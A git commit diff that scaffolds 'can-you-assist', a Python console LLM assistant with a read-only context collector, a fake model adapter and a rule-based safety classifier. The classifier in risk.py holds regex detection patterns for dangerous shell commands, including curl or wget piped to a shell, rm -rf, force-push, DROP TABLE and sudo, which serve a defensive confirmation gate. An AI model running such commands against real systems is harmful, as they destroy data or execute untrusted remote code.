feat(cya): T01-T07 core console-native MVP slice (CYA-WP-0001)

- T01: Python + Typer/rich + pyproject.toml + full src/ layout + working `cya` CLI entrypoint
- T02: Bounded transparent context collector (top-level only, provenance, ignores) + --explain-context
- T03: Genuine rule-based risk classifier (primary) + mandatory terminal confirmation, no auto-execute
- T04: LLMAdapter Protocol + deterministic FakeLLMAdapter seam (llm-connect boundary, zero bypass)
- T05: Strictly minimal phase-memory no-op ports (loud markers, per operator direction 2026-05-26)
- T06: Orchestrator coordinating the full flow; CLI is thin delegation
- T07: pytest harness + safety-focused tests (risk invariants + collector)

All changes verified by running the installed `cya` binary and `pytest tests/`.

Workplan updated with status. State Hub progress event logged (workstream 0a1233fd...).

Refs: CYA-WP-0001, Decision a644364b-11c4-49a9-bf17-99063382e27b
This commit is contained in:
2026-05-26 02:19:13 +02:00
parent da6c7acfc9
commit 637919dd8c
16 changed files with 1308 additions and 8 deletions

46
pyproject.toml Normal file
View File

@@ -0,0 +1,46 @@
[build-system]
requires = ["setuptools>=64", "wheel"]
build-backend = "setuptools.build_meta"
[project]
name = "can-you-assist"
version = "0.1.0"
description = "Console-native, backend-agnostic LLM assistant for practical local work from the shell. MVP slice."
readme = "README.md"
requires-python = ">=3.10"
license = { text = "MIT" }
authors = [
{ name = "Bernd Worsch (custodian) + Grok (initial scaffolding)" }
]
dependencies = [
"typer[standard]>=0.12.0",
"rich>=13.0.0",
]
[project.scripts]
cya = "cya.cli.main:run"
[tool.setuptools.packages.find]
where = ["src"]
[tool.setuptools]
zip-safe = false
[project.urls]
Homepage = "https://github.com/worsch/can-you-assist"
Repository = "https://github.com/worsch/can-you-assist"
[tool.ruff]
line-length = 100
target-version = "py310"
[tool.pytest.ini_options]
testpaths = ["tests"]
python_files = ["test_*.py"]
python_classes = ["Test*"]
python_functions = ["test_*"]
addopts = "-q --tb=short"
markers = [
"safety: core safety and risk classifier invariants (always run)",
]

8
src/cya/__init__.py Normal file
View File

@@ -0,0 +1,8 @@
"""can-you-assist (cya)
Console-native LLM assistant for practical local work (MVP scaffolding).
See workplans/CYA-WP-0001 for the full task breakdown and integration boundaries.
"""
__version__ = "0.1.0"

5
src/cya/cli/__init__.py Normal file
View File

@@ -0,0 +1,5 @@
"""CLI surface and entrypoint (T01).
The primary user-facing commands live here. Later tasks will extend with
context-aware behavior while keeping this the stable surface.
"""

122
src/cya/cli/main.py Normal file
View File

@@ -0,0 +1,122 @@
"""T01 — Project scaffolding and Typer CLI entrypoint.
Implements the minimal runnable package per CYA-WP-0001-T01 acceptance criteria:
- pyproject.toml + src/ layout with clean separation (cli, context, safety, llm, memory)
- `cya --help`, `cya --version`, `cya "<natural language request>"` all work after `pip install -e .`
- Rich, structured, human-readable output even before LLM / collector wiring.
- Graceful fallback message pointing to the remaining workplan tasks.
This module will evolve in T06 (orchestrator) but the surface contract stays stable.
"""
from __future__ import annotations
import sys
import typer
from rich.console import Console
from rich.panel import Panel
from rich.text import Text
from cya import __version__
from cya.context.collector import collect, render_explanation
app = typer.Typer(
name="cya",
help=(
"[bold cyan]cya[/bold cyan] — console-native assistant for local work.\n\n"
"Express intent in natural language from your terminal.\n"
"MVP T01 (scaffolding): this is the skeleton only. "
"Real context collection (T02), rule-based safety (T03), llm-connect boundary (T04), "
"and orchestration (T06) are added in subsequent tasks.\n\n"
"Usage: [bold]cya \"your request in plain English\"[/bold]"
),
rich_markup_mode="rich",
add_completion=False,
invoke_without_command=True,
)
console = Console()
def version_callback(value: bool) -> None:
"""Print version and exit (eager)."""
if value:
console.print(f"[bold]cya[/bold] version [green]{__version__}[/green] (MVP T01 scaffolding)")
raise typer.Exit()
@app.callback()
def main(
ctx: typer.Context,
request: str | None = typer.Argument(
None,
help="Your natural-language request or intent (e.g. 'explain the recent git log for this repo').",
),
explain_context: bool = typer.Option(
False,
"--explain-context",
"-C",
help="Show exactly what local context would be collected (real implementation in T02).",
),
dry_run: bool = typer.Option(
False,
"--dry-run",
"-n",
help="Preview mode — do not perform any actions (stub in T01).",
),
version: bool = typer.Option(
None,
"--version",
"-V",
callback=version_callback,
is_eager=True,
help="Show cya version and exit.",
),
) -> None:
"""Root entry: supports bare `cya "request"` as the primary one-shot UX."""
if ctx.invoked_subcommand is not None:
# A real subcommand was given; let Typer handle it.
return
if request is None:
# No request and no subcommand — show friendly guidance instead of raw error.
console.print(
Panel(
Text.from_markup(
"No request provided.\n\n"
"Try:\n"
" [bold]cya \"what changed since the last commit?\"[/bold]\n"
" [bold]cya --help[/bold] for all options and examples\n\n"
"[dim]This is T01 scaffolding. Full behavior arrives after T02T06.[/dim]"
),
title="cya (MVP)",
border_style="yellow",
padding=(1, 2),
)
)
raise typer.Exit(0)
# Delegate the entire coordinated flow (T02T04) to the orchestrator (T06).
# This keeps the Typer surface thin and makes the core logic testable.
from cya.orchestrator import handle_request
handle_request(
request,
explain_context=explain_context,
dry_run=dry_run,
)
if __name__ == "__main__":
app()
def run() -> None:
"""Primary console-script entry point (no-arg callable expected by setuptools/pip).
The generated `cya` wrapper in bin/ does `sys.exit(run())`.
Using a thin wrapper around app() lets us keep the full-featured
@app.callback(invoke_without_command=True) + ctx signature for Typer/Click.
"""
app()

View File

@@ -0,0 +1,9 @@
"""Local context collector (T02).
Implements the safe, transparent, intentionally bounded collector described in
INTENT.md, SCOPE.md, and workplan CYA-WP-0001-T02.
All collection is read-only, user-inspectable via --explain-context, and
never traverses dangerous locations or hidden user data without explicit
future opt-in.
"""

View File

@@ -0,0 +1,309 @@
"""Bounded, transparent, pure local context collector (T02).
Implements the collector contract from CYA-WP-0001-T02, INTENT.md, and SCOPE.md.
Design principles (strict for this slice):
- Top-level directory entries only (never recursive).
- Hard-coded, conservative ignore list for build artifacts, vcs, venvs, caches.
- Git state gathered exclusively via short, read-only, timeout-bounded subprocess calls.
- Never touches shell history, ~/.config, credentials, or any hidden user data.
- Produces a stable, JSON-serializable ContextEnvelope with clear provenance on every item.
- The module itself is side-effect free except for the explicit read-only inspections.
The --explain-context / --show-context flag (wired in cli) is the user-visible
contract: it must print *exactly* the data that would be sent onward, with
provenance for each piece.
Later tasks (T06 orchestrator, T04 boundary) will consume the same envelope.
Real per-request file globs and stdin handling will be added as thin extensions
without changing the core collector shape.
"""
from __future__ import annotations
import json
import os
import subprocess
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any
# ---------------------------------------------------------------------------
# Envelope (stable, serializable, provenance-carrying)
# ---------------------------------------------------------------------------
@dataclass
class ContextEnvelope:
"""The single data structure that travels to the LLM adapter and to the
user via --explain-context.
All fields carry explicit "provenance" markers so the model (and the user)
can see exactly where each fact came from.
"""
cwd: str
top_level: list[dict[str, Any]] = field(default_factory=list)
git: dict[str, Any] | None = None
env: dict[str, str] = field(default_factory=dict)
collected_at: str = ""
notes: list[str] = field(default_factory=list)
def to_dict(self) -> dict[str, Any]:
"""JSON-safe representation for the model and for tests."""
return asdict(self)
def to_json(self, indent: int = 2) -> str:
return json.dumps(self.to_dict(), indent=indent, default=str)
# ---------------------------------------------------------------------------
# Ignore policy (name-based, conservative, no .gitignore parsing in T02)
# ---------------------------------------------------------------------------
def _default_ignore_patterns() -> set[str]:
"""Names we never surface at the top level (MVP policy).
This is intentionally simple and name-based. No pathspec, no gitignore
parsing, no content scanning. A later memory layer can offer richer
user-controlled filters.
"""
return {
".git",
".hg",
".svn",
".venv",
"venv",
".env",
"env",
"node_modules",
"__pycache__",
".pytest_cache",
".mypy_cache",
".ruff_cache",
".cache",
".tox",
".nox",
"dist",
"build",
"htmlcov",
".eggs",
".egg-info",
".hypothesis",
".coverage",
".pytype",
".pyre",
"target", # rust / java etc.
}
def _is_likely_ignored(name: str, patterns: set[str]) -> bool:
"""Return True if this top-level name should be suppressed from the envelope."""
if not name:
return True
if name in patterns:
return True
# Conservative hidden-file rule (except a tiny allow-list for common signal).
if name.startswith(".") and name not in {".gitignore", ".env.example", ".cya"}:
return True
return False
# ---------------------------------------------------------------------------
# Collectors (each is a pure, read-only, best-effort function)
# ---------------------------------------------------------------------------
def collect_top_level(top: Path | str = ".") -> list[dict[str, Any]]:
"""Return a bounded list of top-level entries with provenance.
Never descends into subdirectories. Never follows symlinks for traversal.
"""
root = Path(top).resolve()
patterns = _default_ignore_patterns()
entries: list[dict[str, Any]] = []
try:
it = root.iterdir()
except (PermissionError, OSError) as e:
return [{"error": "cannot_list", "reason": str(e), "provenance": "cwd.top_level"}]
for p in it:
name = p.name
ignored = _is_likely_ignored(name, patterns)
kind = "dir" if p.is_dir() else "file"
size: int | None = None
if not ignored and p.is_file():
try:
size = p.stat().st_size
except OSError:
size = None
entry = {
"name": name,
"kind": kind,
"ignored": ignored,
"size": size,
"provenance": "cwd.top_level",
}
entries.append(entry)
# Sort for stable output (dirs first, then alpha).
entries.sort(key=lambda e: (0 if e["kind"] == "dir" else 1, e["name"].lower()))
return entries
def collect_git(top: Path | str = ".") -> dict[str, Any] | None:
"""Best-effort, strictly read-only git summary.
Uses short, timeout-protected subprocess calls. Returns None (not an
exception) when not a git tree or when git is unavailable. This keeps
the collector usable everywhere.
"""
root = Path(top).resolve()
info: dict[str, Any] = {"provenance": "git.subprocess.readonly"}
try:
# Current branch (or detached)
r = subprocess.run(
["git", "branch", "--show-current"],
cwd=root,
capture_output=True,
text=True,
timeout=1.5,
check=False,
)
branch = r.stdout.strip() or None
if branch:
info["branch"] = branch
# Porcelain status (very compact)
r = subprocess.run(
["git", "status", "--short", "--branch"],
cwd=root,
capture_output=True,
text=True,
timeout=2.0,
check=False,
)
status = r.stdout.strip()
if status:
info["status"] = status.splitlines()[:20] # bound the output
# Last commit (subject only)
r = subprocess.run(
["git", "log", "-1", "--pretty=format:%h %s"],
cwd=root,
capture_output=True,
text=True,
timeout=1.5,
check=False,
)
last = r.stdout.strip()
if last:
info["last_commit"] = last
if len(info) == 1: # only provenance
return None
return info
except (FileNotFoundError, PermissionError, subprocess.TimeoutExpired, OSError):
return None
def collect_env() -> dict[str, str]:
"""Tiny, high-signal environment facts only.
We deliberately do *not* dump the whole os.environ.
"""
wanted = ("SHELL", "EDITOR", "VISUAL", "LANG", "PWD")
return {k: os.environ.get(k, "") for k in wanted if k in os.environ}
def collect(top: Path | str = ".") -> ContextEnvelope:
"""Primary entry point. Returns a fully populated, serializable envelope."""
root = Path(top).resolve()
now = datetime.now(timezone.utc).isoformat()
envelope = ContextEnvelope(
cwd=str(root),
top_level=collect_top_level(root),
git=collect_git(root),
env=collect_env(),
collected_at=now,
notes=[
"Top-level entries only (no recursion by design).",
"Name-based ignore list for build, cache, and VCS directories.",
"Git data obtained via short read-only subprocess calls (best effort).",
"No user history, no dotfile scraping, no credential scanning.",
],
)
return envelope
# ---------------------------------------------------------------------------
# Human / model explanation rendering (rich-aware, optional)
# ---------------------------------------------------------------------------
def render_explanation(envelope: ContextEnvelope, *, rich: bool = True) -> str:
"""Return a compact, provenance-aware textual explanation.
When rich=True and the rich library is importable, the caller can further
enhance with Panels/Trees. For the collector itself we stay with plain
text so the module remains usable in minimal environments.
"""
lines: list[str] = []
lines.append(f"Context collected {envelope.collected_at}")
lines.append(f"Root: {envelope.cwd}")
lines.append("")
# Top level (only the non-ignored ones for the primary view)
shown = [e for e in envelope.top_level if not e.get("ignored")]
if shown:
lines.append("Top-level entries (filtered, non-recursive):")
for e in shown:
size = f" ({e['size']} B)" if e.get("size") is not None else ""
lines.append(f"{e['name']} [{e['kind']}{size}] — {e['provenance']}")
else:
lines.append("Top-level entries: (none or all ignored)")
if envelope.git:
lines.append("")
lines.append("Git:")
g = envelope.git
if g.get("branch"):
lines.append(f" branch: {g['branch']}")
if g.get("last_commit"):
lines.append(f" last: {g['last_commit']}")
if g.get("status"):
st = g["status"]
if isinstance(st, list):
st = "; ".join(st)
lines.append(f" status: {st[:180]}")
if envelope.env:
lines.append("")
lines.append("Environment hints:")
for k, v in envelope.env.items():
if v:
lines.append(f" {k}={v}")
lines.append("")
lines.append("Collection notes:")
for n in envelope.notes:
lines.append(f" - {n}")
return "\n".join(lines)
__all__ = [
"ContextEnvelope",
"collect",
"collect_top_level",
"collect_git",
"collect_env",
"render_explanation",
]

27
src/cya/llm/__init__.py Normal file
View File

@@ -0,0 +1,27 @@
"""llm-connect adapter boundary — the integration seam (T04).
can-you-assist owns orchestration + CLI experience.
llm-connect owns provider access, config, token counting, and structured I/O.
This package defines the small stable Protocol / interface that all model
interaction must flow through. A deterministic fake lives here for tests.
Real delegation to llm-connect is a small localized change once the contract
is stable.
See workplan CYA-WP-0001-T04 for the full contract and acceptance criteria.
"""
from .adapter import (
AssistanceRequest,
AssistanceResponse,
LLMAdapter,
FakeLLMAdapter,
)
__all__ = [
"AssistanceRequest",
"AssistanceResponse",
"LLMAdapter",
"FakeLLMAdapter",
]

139
src/cya/llm/adapter.py Normal file
View File

@@ -0,0 +1,139 @@
"""llm-connect adapter boundary (T04 — the integration seam).
Per SCOPE.md and INTENT.md:
- `can-you-assist` owns orchestration + CLI experience.
- `llm-connect` owns provider access, config, token counting, and structured I/O.
This module defines the single stable contract that *all* model interaction
in this repository must flow through. There must never be a production code
path that talks to an LLM (or a mock) while bypassing this boundary.
Design goals for the MVP slice:
- Tiny, stable surface (Protocol + two simple data containers).
- A deterministic, fully reproducible FakeLLMAdapter for tests and early demos.
- Easy future replacement: swapping the fake for a real (or stubbed)
llm-connect client must be a small, localized change.
See workplan CYA-WP-0001-T04 for the full acceptance criteria and the
"Integration Guide for llm-connect" expectations.
"""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Any, Protocol
# ---------------------------------------------------------------------------
# Request / Response shapes (kept minimal for T04)
# These will evolve slightly when the real orchestrator (T06) and
# llm-connect types are known, but the boundary contract stays stable.
# ---------------------------------------------------------------------------
@dataclass
class AssistanceRequest:
"""What we send to the LLM adapter.
Contains the framed user intent, the packed context envelope (or its
serialised form), and any hints the caller wants to pass (model prefs,
token budget, etc.). The adapter is allowed to ignore hints it does not
understand.
"""
user_request: str
context: dict[str, Any] | None = None # usually a ContextEnvelope.to_dict()
hints: dict[str, Any] = field(default_factory=dict)
@dataclass
class AssistanceResponse:
"""What comes back from the LLM adapter.
The orchestrator / CLI is responsible for turning this into the final
user-facing output. The raw fields are intentionally rich so that
different front-ends (terminal, future voice) can render appropriately.
"""
suggestion: str
explanation: str = ""
rationale: str = ""
risks: list[str] = field(default_factory=list)
raw_model_output: str | None = None
metadata: dict[str, Any] = field(default_factory=dict)
# ---------------------------------------------------------------------------
# The stable boundary
# ---------------------------------------------------------------------------
class LLMAdapter(Protocol):
"""The single seam for all model interaction.
Any real implementation (llm-connect or otherwise) must satisfy this
protocol. All production call sites must go through an instance of
something obeying this interface.
"""
def complete(self, request: AssistanceRequest) -> AssistanceResponse:
"""Turn a framed request + context into a structured assistant response."""
...
# ---------------------------------------------------------------------------
# Deterministic fake (used by tests, early demos, and T06 development)
# ---------------------------------------------------------------------------
class FakeLLMAdapter:
"""A fully deterministic, side-effect-free fake adapter.
Returns canned but useful responses that are stable across runs.
The response content is derived only from the request text so that
tests can assert on it without any network or real model.
This is the implementation that must be used by all unit and safety
tests until a real adapter is explicitly swapped in.
"""
def complete(self, request: AssistanceRequest) -> AssistanceResponse:
user_text = request.user_request.strip()
risks: list[str] = []
# Very simple deterministic logic for the MVP slice.
# In a real adapter this would be the call to llm-connect.
if "delete" in user_text.lower() or "remove" in user_text.lower():
suggestion = "I cannot recommend executing that directly. Consider a more targeted command or review the exact files first."
explanation = "Your request contained destructive language. The safety layer already required confirmation; the model echoes caution."
rationale = "Rule-based safety + conservative model policy."
risks = ["Destructive intent detected by rules", "Broad scope in request"]
elif "git" in user_text.lower() and ("log" in user_text.lower() or "history" in user_text.lower()):
suggestion = "Run: git log --oneline -10 --graph --decorate"
explanation = "Standard, safe way to view recent history with a compact graph."
rationale = "Common informational request; safe read-only operation."
else:
suggestion = f"Understood: {user_text[:80]}...\n\nSuggested next step: explore the current directory with `ls -la` or `git status` and share more specific intent."
explanation = "This is a placeholder response from the FakeLLMAdapter (T04)."
rationale = "No high-risk patterns; generic helpful reply."
return AssistanceResponse(
suggestion=suggestion,
explanation=explanation,
rationale=rationale,
risks=risks,
raw_model_output=f"[FAKE] echo of request: {user_text[:200]}",
metadata={
"adapter": "FakeLLMAdapter",
"version": "t04-mvp",
"deterministic": True,
},
)
__all__ = [
"AssistanceRequest",
"AssistanceResponse",
"LLMAdapter",
"FakeLLMAdapter",
]

View File

@@ -0,0 +1,89 @@
"""phase-memory ports (T05) — strictly minimal no-op version.
Operator direction (2026-05-26): Keep strictly minimal in this slice.
Pure explicit ports with no-op implementations and clear
"to be replaced by real phase-memory integration" markers.
**No local JSON placeholder or file-backed store in this slice.**
All memory interactions in can-you-assist must go through these ports.
No global singletons, no implicit ~/.cache, no opaque vendor memory.
When the real `phase-memory` package is integrated, the entire contents
of this module (or the implementations behind these names) will be
replaced by the real ports. Code reviewers and future contributors
should be able to point at this file and say "this is the seam".
See workplan CYA-WP-0001-T05 for the full contract and acceptance criteria.
"""
from __future__ import annotations
import sys
from typing import Any
def _warn_not_connected(feature: str) -> None:
"""Loud, visible marker that phase-memory is not yet wired."""
msg = (
f"[phase-memory] {feature} called — phase-memory not yet connected. "
"This is a no-op placeholder. Real implementation will come from the "
"phase-memory package. See T05 in workplan CYA-WP-0001."
)
print(msg, file=sys.stderr)
# ---------------------------------------------------------------------------
# Explicit ports (the four capabilities from the workplan)
# These are the exact extension points that phase-memory will implement.
# ---------------------------------------------------------------------------
def remember_preference(key: str, value: Any, scope: str = "cwd") -> None:
"""Remember a user preference or workflow pattern.
Will be replaced by real phase-memory.
"""
_warn_not_connected(f"remember_preference({key!r}, scope={scope})")
# No-op by design
def recall_preferences(scope: str = "cwd", task_class: str | None = None) -> dict[str, Any]:
"""Recall relevant history / preferences for the current cwd + task class.
Will be replaced by real phase-memory.
Returns empty dict in this slice.
"""
_warn_not_connected(f"recall_preferences(scope={scope}, task={task_class})")
return {}
def forget(scope: str = "cwd", keys: list[str] | None = None) -> None:
"""Forget / reset memory (scoped).
Will be replaced by real phase-memory.
"""
_warn_not_connected(f"forget(scope={scope}, keys={keys})")
# No-op
def export_memory(scope: str = "cwd") -> dict[str, Any]:
"""Inspect / export current memory for this project or user.
Will be replaced by real phase-memory.
Returns a clear "disabled" marker in this slice.
"""
_warn_not_connected(f"export_memory(scope={scope})")
return {
"status": "phase-memory not connected (T05 no-op)",
"scope": scope,
"note": "Replace this entire module with the real phase-memory ports.",
}
__all__ = [
"remember_preference",
"recall_preferences",
"forget",
"export_memory",
]

117
src/cya/orchestrator.py Normal file
View File

@@ -0,0 +1,117 @@
"""Assistance orchestrator (T06).
The piece that turns raw user intent + collected context into a well-formed
request for the LLM adapter (T04), then turns the adapter response into the
final terminal output the user sees.
Responsibilities in this slice:
- Own the end-to-end happy path after Typer argument parsing.
- Coordinate context collector (T02), risk classifier (T03), and LLMAdapter (T04).
- Keep the CLI surface (main.py) thin — it should only do argument parsing,
help/version, and delegation to this orchestrator.
- Be testable in isolation with the FakeLLMAdapter (critical for T07).
This module is the natural home for future prompt framing, context packing
with token awareness, safety charter injection, and response post-processing.
See workplan CYA-WP-0001-T06.
"""
from __future__ import annotations
from rich.console import Console
from rich.panel import Panel
from cya.context.collector import collect, render_explanation
from cya.safety.risk import classify, get_user_confirmation
from cya.llm.adapter import AssistanceRequest, FakeLLMAdapter
console = Console()
def handle_request(
user_request: str,
*,
explain_context: bool = False,
dry_run: bool = False,
) -> None:
"""Primary orchestrator entry point.
This is what the CLI (and future tests / other front-ends) should call.
It coordinates the full current flow:
context → safety (with mandatory confirmation) → LLMAdapter → render
"""
# 1. Context (always cheap; needed for safety "affected" and for the adapter)
try:
envelope = collect(".")
except Exception:
envelope = None
if explain_context and envelope:
try:
explanation = render_explanation(envelope)
console.print(
Panel(
explanation,
title="Context Envelope (T02)",
border_style="green",
padding=(1, 1),
)
)
except Exception as exc:
console.print(f"[red]Context explanation error: {exc}[/red]")
# 2. Risk classification + mandatory confirmation (T03)
assessment = classify(user_request, envelope)
if assessment.requires_confirmation:
from rich.table import Table
table = Table(
title=f"Risk Assessment — {assessment.level.value.upper()}",
show_header=False,
border_style="red",
)
table.add_row("Rationale", assessment.rationale)
if assessment.preview:
table.add_row("Preview", assessment.preview)
if assessment.affected_summary:
table.add_row("Would affect", assessment.affected_summary)
table.add_row("Rules", ", ".join(assessment.rules_triggered[:3]))
console.print(table)
if not get_user_confirmation(assessment):
console.print("[yellow]Action cancelled by user. No changes made.[/yellow]")
return
if dry_run:
console.print("[green]--dry-run acknowledged.[/green] No side-effects.")
return
# 3. Call through the single LLMAdapter boundary (T04)
adapter = FakeLLMAdapter()
llm_request = AssistanceRequest(
user_request=user_request,
context=envelope.to_dict() if envelope else None,
)
llm_response = adapter.complete(llm_request)
# 4. Render final user-facing artifact (T06 responsibility)
console.print(
Panel(
f"[bold]Suggestion:[/bold]\n{llm_response.suggestion}\n\n"
f"[dim]{llm_response.explanation}\n"
f"Rationale: {llm_response.rationale}[/dim]",
title="LLM Response (via T04 seam)",
border_style="magenta",
padding=(1, 1),
)
)
console.print(
"[green]✓[/green] Request processed by orchestrator (T02+T03+T04 coordinated by T06)."
)
__all__ = ["handle_request"]

View File

@@ -0,0 +1,23 @@
"""Risk classification and confirmation layer (T03).
Genuine rule-based assessment is the primary mechanism (per operator direction
recorded 2026-05-26). Results are surfaced to the LLM as structured context
where appropriate. Architecture or policy decisions that surface become ADRs.
See workplan CYA-WP-0001-T03 for the full contract and acceptance criteria.
"""
from .risk import (
RiskAssessment,
RiskLevel,
classify,
get_user_confirmation,
)
__all__ = [
"RiskLevel",
"RiskAssessment",
"classify",
"get_user_confirmation",
]

273
src/cya/safety/risk.py Normal file
View File

@@ -0,0 +1,273 @@
"""Risk classification and mandatory confirmation layer (T03).
Genuine rule-based assessment is the *primary* mechanism (per operator
direction recorded 2026-05-26 in Decision D1).
Results are designed to be surfaced to the LLM as structured context.
The LLM may propose or refine suggestions, but any architecture-level,
policy, or significant design decisions that surface during use must be
captured as ADRs in this repository.
This module is intentionally simple, deterministic, and fully inspectable.
No ML, no external calls, no hidden state.
See workplan CYA-WP-0001-T03 for the full contract and acceptance criteria.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Optional, TYPE_CHECKING
if TYPE_CHECKING:
from cya.context.collector import ContextEnvelope
class RiskLevel(str, Enum):
"""Ordered from least to most concerning for UX decisions."""
SAFE = "safe"
REVIEW = "review"
DESTRUCTIVE = "destructive"
MASS_EDIT = "mass_edit"
PRIVILEGED = "privileged"
NETWORK_AFFECTING = "network_affecting"
OTHER = "other"
@dataclass
class RiskAssessment:
"""Structured output of the classifier.
This object (or its dict form) is what gets attached to the request
going to the LLM and is what drives the mandatory confirmation UI.
"""
level: RiskLevel
rationale: str
rules_triggered: List[str] = field(default_factory=list)
preview: Optional[str] = None
affected_summary: Optional[str] = None
requires_confirmation: bool = False
confidence: float = 0.75
def to_dict(self) -> dict:
return {
"level": self.level.value,
"rationale": self.rationale,
"rules_triggered": self.rules_triggered,
"preview": self.preview,
"affected_summary": self.affected_summary,
"requires_confirmation": self.requires_confirmation,
"confidence": self.confidence,
}
# ---------------------------------------------------------------------------
# Rule definitions (conservative, name-based, easy to audit and extend)
# Order matters: more specific/dangerous rules first.
# ---------------------------------------------------------------------------
_RULES: list[tuple[re.Pattern, RiskLevel, str]] = [
# Extremely destructive / irreversible filesystem operations
(
re.compile(r"\brm\s+-r(f|)\s+", re.I),
RiskLevel.DESTRUCTIVE,
"Destructive recursive remove (rm -rf style).",
),
(
re.compile(r"\brm\s+--recursive\b", re.I),
RiskLevel.DESTRUCTIVE,
"Destructive recursive remove.",
),
(
re.compile(r"\b(delete\s+(all|every|recursive)|rmdir\s+-p)\b", re.I),
RiskLevel.DESTRUCTIVE,
"Broad destructive deletion intent.",
),
(
re.compile(r"\b(drop\s+(table|database|schema)|truncate\s+table)\b", re.I),
RiskLevel.DESTRUCTIVE,
"Destructive database operation.",
),
(
re.compile(r"\b(git\s+(push\s+(-f|--force)|reset\s+--hard|clean\s+-f(d|)))\b", re.I),
RiskLevel.DESTRUCTIVE,
"Destructive git operation (force push, hard reset, aggressive clean).",
),
(
re.compile(r"\b(chmod\s+(-R\s+)?[0-7]{3,4}\b|chown\s+-R)\b", re.I),
RiskLevel.PRIVILEGED,
"Privilege escalation or mass permission change.",
),
# Mass-edit / bulk modification
(
re.compile(r"\b(find\s+.*-exec\s+(rm|sed\s+-i|perl\s+-i)|xargs\s+(rm|sed\s+-i))\b", re.I),
RiskLevel.MASS_EDIT,
"Bulk / mass modification pattern via find + exec or xargs.",
),
# Network + execution (common supply-chain / remote code execution vectors)
(
re.compile(r"\b(curl\s+[^\|]*\|\s*(bash|sh|zsh|fish|python)|wget\s+[^\|]*\|\s*(bash|sh))\b", re.I),
RiskLevel.NETWORK_AFFECTING,
"Remote content piped directly to a shell interpreter.",
),
(
re.compile(r"\b(sudo\s+|su\s+(-|root)|doas\s+)\b", re.I),
RiskLevel.PRIVILEGED,
"Privileged execution requested.",
),
# Broad dangerous intent language (even if not perfect shell syntax yet)
(
re.compile(r"\b(delete|remove|destroy|wipe|purge)\s+(every|all|recursive|entire|logs?\s+older)\b", re.I),
RiskLevel.DESTRUCTIVE,
"User intent to perform broad destructive removal.",
),
# Read-only or informational commands are generally safe
(
re.compile(r"^\s*(ls|cat|head|tail|less|more|grep|rg|find\s+.*-name|git\s+(log|status|diff|show|branch)|echo)\b", re.I),
RiskLevel.SAFE,
"Read-only / informational command pattern.",
),
]
def classify(request: str, context: Optional["ContextEnvelope"] = None) -> RiskAssessment:
"""Primary rule-based risk classifier.
Returns the highest-severity matching assessment.
Always produces a result; never raises for bad input.
"""
if not request or not request.strip():
return RiskAssessment(
level=RiskLevel.OTHER,
rationale="Empty or whitespace-only request.",
requires_confirmation=False,
)
triggered: List[str] = []
chosen_level = RiskLevel.SAFE
chosen_rationale = "Request appears safe based on current rules."
text = request.strip()
for pattern, level, rationale in _RULES:
if pattern.search(text):
triggered.append(rationale)
# Higher severity wins (destructive > review > safe, etc.)
if _severity(level) > _severity(chosen_level):
chosen_level = level
chosen_rationale = rationale
requires = chosen_level != RiskLevel.SAFE
# Build a conservative preview for T03 (pre-orchestrator).
# In T06+ the real suggestion from the LLM will be used.
preview = _build_preview(text, chosen_level, context)
affected = _build_affected_summary(context) if context else None
return RiskAssessment(
level=chosen_level,
rationale=chosen_rationale,
rules_triggered=triggered or ["No specific high-risk rule matched."],
preview=preview,
affected_summary=affected,
requires_confirmation=requires,
confidence=0.85 if triggered else 0.6,
)
def _severity(level: RiskLevel) -> int:
order = {
RiskLevel.SAFE: 0,
RiskLevel.REVIEW: 1,
RiskLevel.OTHER: 2,
RiskLevel.NETWORK_AFFECTING: 3,
RiskLevel.MASS_EDIT: 4,
RiskLevel.PRIVILEGED: 5,
RiskLevel.DESTRUCTIVE: 6,
}
return order.get(level, 0)
def _build_preview(request: str, level: RiskLevel, context: Optional["ContextEnvelope"]) -> str:
"""Generate a human-readable, copy-pasteable preview for the current request."""
cwd = context.cwd if context else "current directory"
if level == RiskLevel.DESTRUCTIVE:
return f"Would perform destructive removal in {cwd} based on: {request[:120]}"
if level == RiskLevel.MASS_EDIT:
return f"Would perform bulk modifications across files in {cwd}"
if level == RiskLevel.PRIVILEGED:
return f"Would execute privileged command: {request[:100]}"
if level == RiskLevel.NETWORK_AFFECTING:
return f"Would fetch and execute remote content (network + exec risk)"
if level == RiskLevel.REVIEW:
return f"Would perform: {request[:140]} (review recommended)"
return f"Would handle request: {request[:140]}"
def _build_affected_summary(context: Optional["ContextEnvelope"]) -> str | None:
if not context:
return None
top = [e["name"] for e in context.top_level if not e.get("ignored")][:8]
return f"Working in: {context.cwd}. Visible top-level items: {', '.join(top)}"
# ---------------------------------------------------------------------------
# Mandatory confirmation (always in the launching terminal)
# ---------------------------------------------------------------------------
def get_user_confirmation(assessment: RiskAssessment, *, prompt: str | None = None) -> bool:
"""Force an explicit confirmation from the user in the controlling terminal.
Returns True only on clear affirmative input.
Uses typer.confirm when available for nice rich prompting; falls back to
plain input() so the behaviour works even in minimal environments.
This is the enforcement point for the "never auto-execute" rule.
"""
if not assessment.requires_confirmation:
return True
message = prompt or _default_confirmation_message(assessment)
try:
import typer
# typer.confirm prints to stderr/stdout appropriately and reads from the
# controlling terminal. It respects --yes / non-interactive cases in
# a sane way for a CLI tool.
return typer.confirm(message, default=False)
except Exception:
# Very defensive fallback still requires explicit typing
print(message + " [y/N]: ", end="", flush=True)
try:
answer = input().strip().lower()
return answer in ("y", "yes")
except EOFError:
return False
def _default_confirmation_message(assessment: RiskAssessment) -> str:
lines = [
f"\nRisk level: {assessment.level.value.upper()}",
f"Rationale: {assessment.rationale}",
]
if assessment.preview:
lines.append(f"Preview: {assessment.preview}")
if assessment.affected_summary:
lines.append(f"Affected: {assessment.affected_summary}")
lines.append("Proceed? (type 'yes' or 'y' to continue, anything else cancels)")
return "\n".join(lines)
__all__ = [
"RiskLevel",
"RiskAssessment",
"classify",
"get_user_confirmation",
]

10
tests/conftest.py Normal file
View File

@@ -0,0 +1,10 @@
"""Pytest configuration and fixtures for can-you-assist (T07).
Safety-focused tests live here. All tests should be fast and hermetic.
No live LLM or network required for the default run.
"""
import pytest
# Future: common fixtures for envelopes, fake adapters, etc.
# For now this file exists to establish the test layout.

33
tests/test_collector.py Normal file
View File

@@ -0,0 +1,33 @@
"""Tests for the bounded context collector (T02 + T07).
Focus on the hard constraints:
- Never recurses.
- Respects the ignore list for dangerous/expensive locations.
- Always produces a serializable envelope with provenance.
"""
